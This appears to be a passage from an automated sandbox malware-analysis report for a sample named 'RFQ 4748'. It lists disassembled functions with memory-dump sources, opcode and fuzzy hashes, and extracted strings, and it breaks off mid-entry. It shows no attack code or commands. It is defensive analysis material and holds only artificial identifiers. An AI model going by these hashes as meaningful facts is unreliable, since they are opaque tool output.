                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b06cf962c28d17f1434a66d2668affbd247b0c196befa6ceb9dcf5ffb6c23a17
                                                              • Instruction ID: 039833bb9cb043499bc49557f5679539b14b0ba6a51d2c06baed470d8fcf3ccf
                                                              • Opcode Fuzzy Hash: b06cf962c28d17f1434a66d2668affbd247b0c196befa6ceb9dcf5ffb6c23a17
                                                              • Instruction Fuzzy Hash: 63B1E074E05218DFDB54DFAAD484BADBBF2FB89314F208169D809AB265DB345D85CF00
                                                              Function 06ADDC10 Relevance: .2, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65127724e4634e646e7c48868b9bafc1a6453e63db8833872bcdf77bea180ac6
                                                              • Instruction ID: a7c09873705ab6b260ca6e2952ce45f1f8b337aeb355e2659df9b84347ab2b86
                                                              • Opcode Fuzzy Hash: 65127724e4634e646e7c48868b9bafc1a6453e63db8833872bcdf77bea180ac6
                                                              • Instruction Fuzzy Hash: 43A10574E05218DFDB94EF69D884BADB7B2BB89300F1091AAD40AAB354DB346D85CF50
                                                              Function 06ADC1A0 Relevance: .2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4018bf95b9c304244cb22d6269a9d28202316be15b36bd8b65daec58ce618af9
                                                              • Instruction ID: b711fa448c3492fd489e3201cc602ffa0381c0deadda9b871873b7925afb3572
                                                              • Opcode Fuzzy Hash: 4018bf95b9c304244cb22d6269a9d28202316be15b36bd8b65daec58ce618af9
                                                              • Instruction Fuzzy Hash: 66914C74E04218DFDB94EFA9D888BADBBB5BB89314F50916AD00BA7354DB349845CF40
                                                              Function 06ADDC00 Relevance: .2, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d24186b0b9a4c14067ca95766c237086651da341e91e891729055bd6da1bef5d
                                                              • Instruction ID: 4601de11596ba7cd8b3a5e4774aaab49472d690722a266ce97dd8477e5f66099
                                                              • Opcode Fuzzy Hash: d24186b0b9a4c14067ca95766c237086651da341e91e891729055bd6da1bef5d
                                                              • Instruction Fuzzy Hash: 89910874E052189FDB94EF69D884B9DBBF6BF89300F1081AAD40AAB354DB345D85CF50
                                                              Function 06ADC1B0 Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc2f8f5d65fbb59e4d895ba4b6cfc107d9a92489c1abf8b84483f566d2ece02d
                                                              • Instruction ID: 043f7e7f03eedef3e964de8aa30942e3cde4d8b0684620ac7cc51bc2e22ae1a0
                                                              • Opcode Fuzzy Hash: dc2f8f5d65fbb59e4d895ba4b6cfc107d9a92489c1abf8b84483f566d2ece02d
                                                              • Instruction Fuzzy Hash: 9A916974E44218CFDB94EFA9D888BADBBF5BB8A314F50916AD00BA7354DB349845CF40
                                                              Function 06ADC2A9 Relevance: .2, Instructions: 213COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b05d0ff6feaaf98d80187497cdb595641af7b1b942f2099323c4cfc5422c301b
                                                              • Instruction ID: 85557e5767b12e812eb58ec5a4f36a4146665e584aef49d18c0000686a71d2ae
                                                              • Opcode Fuzzy Hash: b05d0ff6feaaf98d80187497cdb595641af7b1b942f2099323c4cfc5422c301b
                                                              • Instruction Fuzzy Hash: 77915B74E44218CFDB94EFA9D484BADBBF5BB89314F50916AD00BA7354DB349845CF40
                                                              Function 06F7E8E0 Relevance: .2, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105998096.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f60000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 553529269b322aa14a807a0bddf9f723224107b66ac7775e42698ebf60cdffca
                                                              • Instruction ID: ed1bb62e9662e8f9286b3821803092f9bb97f677ea67a40586e9b259ad0945f0
                                                              • Opcode Fuzzy Hash: 553529269b322aa14a807a0bddf9f723224107b66ac7775e42698ebf60cdffca
                                                              • Instruction Fuzzy Hash: 3681F775E04218CFEBA4DF69C844BADBBF5BF9A304F1494ABC009AB245DB705989CF41
                                                              Function 0585BEAE Relevance: .1, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1a02cfc6cd4722b45bbe666d08b3c58100968bcb37cb6e8cae30d2821e0e283
                                                              • Instruction ID: 5971c5c72174125ba61d5075d3a7e6034fea64951fea1200905142ea1934d458
                                                              • Opcode Fuzzy Hash: e1a02cfc6cd4722b45bbe666d08b3c58100968bcb37cb6e8cae30d2821e0e283
                                                              • Instruction Fuzzy Hash: DA514D78A04218DFCB44EF79D894BAEB7B2FB8A300F5081A5D54AAB359CB346C41CF41
                                                              Function 06F60040 Relevance: .1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105998096.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f60000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b403ee0856d2bf123a6be3391569aecc92fc21aea950b44fbabd2d3b90152f0a
                                                              • Instruction ID: ccf3d1edeae69b13c598087b9a4c54f11f806fa2cb77641afb14522e4a6b841d
                                                              • Opcode Fuzzy Hash: b403ee0856d2bf123a6be3391569aecc92fc21aea950b44fbabd2d3b90152f0a
                                                              • Instruction Fuzzy Hash: 1251C674D042298FDB68DF2AC9886D9B7F6BB88305F10C1EAE409A7265DB305E85CF51
                                                              Function 06AED208 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a90a01473364e0925f3d0dd4d650c3df94f7d470e28b9827829750635b26512
                                                              • Instruction ID: df7a8857444d846ca033864216cc315178318ede4d3d08570026a365c0619360
                                                              • Opcode Fuzzy Hash: 7a90a01473364e0925f3d0dd4d650c3df94f7d470e28b9827829750635b26512
                                                              • Instruction Fuzzy Hash: BD4164B5E016198BDB18DFABC94069EFBF3BFC8300F14C17AD858AB224DB3459468B50
                                                              Function 06C50006 Relevance: .1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cc116ab39df006c4d435eed1ee2aeb413c33e3be9e43c203d05a15b9335ce06
                                                              • Instruction ID: 1ac43d44e5f45f36e3d950a343962f6381393f5909d3dbda5f97a65d511a688f
                                                              • Opcode Fuzzy Hash: 3cc116ab39df006c4d435eed1ee2aeb413c33e3be9e43c203d05a15b9335ce06
                                                              • Instruction Fuzzy Hash: CC417A71E05B548FE759CF6B9C4019AFBF3AFC9201F19C1BAC848AA165EB340986CF11
                                                              Function 06AD1AE0 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4499779c9e5886830fba707b87c09145e107c55c383a7e59c7277fc198b75f96
                                                              • Instruction ID: 0dc4787ac24530c3480dbf4369691d6631a9d6f98047b81bc88688f515d410fb
                                                              • Opcode Fuzzy Hash: 4499779c9e5886830fba707b87c09145e107c55c383a7e59c7277fc198b75f96
                                                              • Instruction Fuzzy Hash: 1541C2B0D05218CFEB58DFAAC944B9DBBF2BF89300F04C1AAD40AAB255D7745985CF50
                                                              Function 06F60007 Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105998096.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f60000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07c1b8d4e0a62679b1ec113f253622457465237eea1d375e01805fc320d0f305
                                                              • Instruction ID: 11ad589aef07ea04d3d291b752c63dbdc26b56952fdb8592178a72362191217e
                                                              • Opcode Fuzzy Hash: 07c1b8d4e0a62679b1ec113f253622457465237eea1d375e01805fc320d0f305
                                                              • Instruction Fuzzy Hash: EC315071D097948FE71ACF6B8C4469ABFF6AF8A304F09C1EBD4889A156DB340A45CF11
                                                              Function 012D7C28 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: baa97d6339b52c9f9eb7dab78b0f902b3a57b327ed7d27ca1a7cbcc83f18c44c
                                                              • Instruction ID: 35efd16c8596e8f816082412e8729b458e6c5b0599406d8f1ba47b756cfb739e
                                                              • Opcode Fuzzy Hash: baa97d6339b52c9f9eb7dab78b0f902b3a57b327ed7d27ca1a7cbcc83f18c44c
                                                              • Instruction Fuzzy Hash: 3D31A7B1D156188BEB68CF6BC95479EFBF6BFC9304F14C0A9C50CA6265DB750A868F00
                                                              Function 012D7C38 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ce51856b570b062e201bb18c09ba67145c27ba49cbe5d3d06c0e4e76b41c347
                                                              • Instruction ID: 9bf8d31a04154c296424469b7534260ed1036e2e8e0fd729481fd20d08d9aa9a
                                                              • Opcode Fuzzy Hash: 7ce51856b570b062e201bb18c09ba67145c27ba49cbe5d3d06c0e4e76b41c347
                                                              • Instruction Fuzzy Hash: 532146B1D056188BEB68CF6BC95878EFAF7BFC9304F54C1A9C50CA6265DB750A858F00
                                                              Function 06AD1AD2 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b69a0286bdec8ad87a9911367200690b3664ae8909f0558ad3b39c67adc362cc
                                                              • Instruction ID: 835fc3df9412a6e34d097c3cdc2d62653afebb3c0c4af2d56652b6e0afa32b5a
                                                              • Opcode Fuzzy Hash: b69a0286bdec8ad87a9911367200690b3664ae8909f0558ad3b39c67adc362cc
                                                              • Instruction Fuzzy Hash: B721C5B1E016188BEB18CF9BD9447CEFAF7BFC8304F14C1AAD409AA255DB7509458F54
                                                              Function 06AE5C48 Relevance: .1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8bce56400fc30ed0a098edb955f7d043773f8275019c4b04c82d848270f7742
                                                              • Instruction ID: 38f6098092fae67e42d7143c68cdab0783f2c494ac010255fb9d9a063ad5c04f
                                                              • Opcode Fuzzy Hash: a8bce56400fc30ed0a098edb955f7d043773f8275019c4b04c82d848270f7742
                                                              • Instruction Fuzzy Hash: 0521FCB1E046188BEB58DF6BD9106D9FBF7AFC9304F44C0BAC40DAA214DB311A858F50
                                                              Function 06AA0620 Relevance: 7.7, Strings: 6, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                              • API String ID: 0-463314800
                                                              • Opcode ID: a47fb50059b5e763608ec6479a33f819bcd79d0d49a5628ae05366231f4c097d
                                                              • Instruction ID: 36c058024ae888080d356bd82d7af1021ca5b102c0c9cb27886c2f049ddefae0
                                                              • Opcode Fuzzy Hash: a47fb50059b5e763608ec6479a33f819bcd79d0d49a5628ae05366231f4c097d
                                                              • Instruction Fuzzy Hash: EA517470A402059FC748EF7999906AFBAEBBFC8300F148929C4499B355DF789906CBA1
                                                              Function 06AA7060 Relevance: 5.2, Strings: 4, Instructions: 235COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (_]q$(_]q$(_]q$(_]q
                                                              • API String ID: 0-2651352888
                                                              • Opcode ID: 8d86be05e310dcd92311d27b120da54d732df57e17843161b2cd70a6db89a6ab
                                                              • Instruction ID: c040d6d78d052e550f0cab5478c8822f8a1c7b54d20d90860b92c2e3bcabc251
                                                              • Opcode Fuzzy Hash: 8d86be05e310dcd92311d27b120da54d732df57e17843161b2cd70a6db89a6ab
                                                              • Instruction Fuzzy Hash: F981D579B003059FC744EB78D8549AFBBB6EF89304B14456AE506EB362DB31DC42CBA1
                                                              Function 012D4580 Relevance: 5.0, Strings: 4, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$jjjjjj$$]q$$]q
                                                              • API String ID: 0-2713803779
                                                              • Opcode ID: 51a635a7875f5fa2458223f6edf4858f7652bf316db9154e6be444e49540ac94
                                                              • Instruction ID: 8680f9cb9f31db5d4ff1e34125d72b82054a17ef987ad2c139e3589e3707eb11
                                                              • Opcode Fuzzy Hash: 51a635a7875f5fa2458223f6edf4858f7652bf316db9154e6be444e49540ac94
                                                              • Instruction Fuzzy Hash: 53C08C2053E2C0DEDB031A7890E11343E246D7310138CC4D1D0810A84BC3B0C586D722
                                                              Function 012D45ED Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$jjjjjj$$]q$$]q
                                                              • API String ID: 0-2713803779
                                                              • Opcode ID: 0768dab359664b19aa4c84bddd0dcb784c18067cc8c1285ac96a4052b3096197
                                                              • Instruction ID: 3988627714834c94367f89a5ae0f16951ceb27d7e50664a09e58717941fabdae
                                                              • Opcode Fuzzy Hash: 0768dab359664b19aa4c84bddd0dcb784c18067cc8c1285ac96a4052b3096197
                                                              • Instruction Fuzzy Hash: 8FB0922180E3C0CECB134E9585C00407F30AA6218130AC1FBC4850F457C1248986D732
                                                              Function 012D45CA Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$jjjjjj$$]q$$]q
                                                              • API String ID: 0-2713803779
                                                              • Opcode ID: 2c36c2082909609ce63941d69bc40389dd17dfe9c5f7ee07f45086b67410f864
                                                              • Instruction ID: 1b273a5298d487b345e78d0847020fced73edc919b66902d7995decb671031d0
                                                              • Opcode Fuzzy Hash: 2c36c2082909609ce63941d69bc40389dd17dfe9c5f7ee07f45086b67410f864
                                                              • Instruction Fuzzy Hash: 09B01230118000C9C600ED44C4A02A03320FF412087358196C0874A900C330C882C602
                                                              Function 012D45AB Relevance: 5.0, Strings: 4, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$jjjjjj$$]q$$]q
                                                              • API String ID: 0-2713803779
                                                              • Opcode ID: f0fa369f64d0c93080a843d1cd3d23d582e0349113b71df279122f8bc9adb42e
                                                              • Instruction ID: caadb9e3d11903e85f8de545222d487e3a30fc87e54db539607e70d1aa7647c3
                                                              • Opcode Fuzzy Hash: f0fa369f64d0c93080a843d1cd3d23d582e0349113b71df279122f8bc9adb42e
                                                              • Instruction Fuzzy Hash: ABB01130228000CACA00AE80C8A02203220FF82208B3282AAC08B8AA00C330C882CA02

                                                              Executed Functions

                                                              Function 029F6748 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-615190528
                                                              • Opcode ID: 7119a8800bd5bf1f9c2adfa56df2d7ab0f4f7d8deb5f30b8d8fdf6d3b0f90068
                                                              • Instruction ID: 70e2a5f0ffd5d8aa7c7e6cb5776fe7cc5234623559369a45d95c4d8f29c9d71b
                                                              • Opcode Fuzzy Hash: 7119a8800bd5bf1f9c2adfa56df2d7ab0f4f7d8deb5f30b8d8fdf6d3b0f90068
                                                              • Instruction Fuzzy Hash: F8126130A00209DFCB94CF69C984AAEBBFAFF88315F148569EA659B265D730DC51CF50
                                                              Function 029FB338 Relevance: 6.6, Strings: 5, Instructions: 349COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: cd38605316af72b1bba3ac0985f256eb9ef963b3abe60d5c82d052afedd7c1ff
                                                              • Instruction ID: 81c09c95cc657a8f0a3966eb961bdd46854fd94ac0f8564248c47ee716e0e7df
                                                              • Opcode Fuzzy Hash: cd38605316af72b1bba3ac0985f256eb9ef963b3abe60d5c82d052afedd7c1ff
                                                              • Instruction Fuzzy Hash: C6E11A74E00218CFDB94CFA9C994A9DBBB6FF49314F1584A9E919AB361DB30E841CF50
                                                              Function 029FBDA0 Relevance: 6.5, Strings: 5, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: c106dce67e4b05ed4141a85239123867c74b384b5914d27833fd5dc65c86969f
                                                              • Instruction ID: 75ad87e32b6b255ce3b42d7a0823691c292ea38fa8a49b388421c56ca9243a87
                                                              • Opcode Fuzzy Hash: c106dce67e4b05ed4141a85239123867c74b384b5914d27833fd5dc65c86969f
                                                              • Instruction Fuzzy Hash: E591D474E00218CFDB54DFAAD994A9DBBF2BF88314F14C469E909AB365DB349941CF10
                                                              Function 029FC457 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 05916d2ebeddb5d13e7489ad083b8b6dd0ce236bedd63f9280830db44cb62b0b
                                                              • Instruction ID: 331b0fd27b78de7a72652e26b047482efd16ce5eaf91590488ad033f6bf29d61
                                                              • Opcode Fuzzy Hash: 05916d2ebeddb5d13e7489ad083b8b6dd0ce236bedd63f9280830db44cb62b0b
                                                              • Instruction Fuzzy Hash: D581E6B4E00218CFDB54DFA9D984A9DBBF2BF88310F14C46AE909AB365DB349945CF10
                                                              Function 029FB7E6 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 63cb9899094eb2e4c7aeebc9b3e0baa1028e2e924b0233674f6a06e22a35fafb
                                                              • Instruction ID: 377cd4b476298e8cbf05c5b7f39ec32163af2dba3b4454395b8b106b62665d08
                                                              • Opcode Fuzzy Hash: 63cb9899094eb2e4c7aeebc9b3e0baa1028e2e924b0233674f6a06e22a35fafb
                                                              • Instruction Fuzzy Hash: 7581E474E00218CFDB54DFAAD994A9DBBF2BF88304F14C469E909AB365DB349981CF10
                                                              Function 029F46D9 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: a11df779a147ef672c05763923fa6013a6d68a2827d95efeb126f9ec471de762
                                                              • Instruction ID: a5964cafe59cb5e485859fc5f0223b00ae543f47bab2b397d011e8fc1cfabe4c
                                                              • Opcode Fuzzy Hash: a11df779a147ef672c05763923fa6013a6d68a2827d95efeb126f9ec471de762
                                                              • Instruction Fuzzy Hash: 74810474E00248CFDB54DFA9D984A9EBBF2BF89300F14D069E919AB365DB309985CF10
                                                              Function 029FC762 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 89fba8fbcf142cb623ef8ec33133bd47534b5097d20890c9b5b1e9c66535cee4
                                                              • Instruction ID: a38b42c69c4e3f02550cea75479ddff3104be3a608d9f5c0b1e9a34d32f8aefb
                                                              • Opcode Fuzzy Hash: 89fba8fbcf142cb623ef8ec33133bd47534b5097d20890c9b5b1e9c66535cee4
                                                              • Instruction Fuzzy Hash: B481C674E00218DFDB54DFAAD984A9DBBF2BF89300F14C06AE909AB365DB349945CF10
                                                              Function 029FCA42 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 02c8339f71ab9577787cd31e0f7dff13a45e1fc77bd98cc19a9b9801d9511d6b
                                                              • Instruction ID: c3af67e422b3957b1b8f5a2982aff90a8ed5c336f9465412463390bb462c74c8
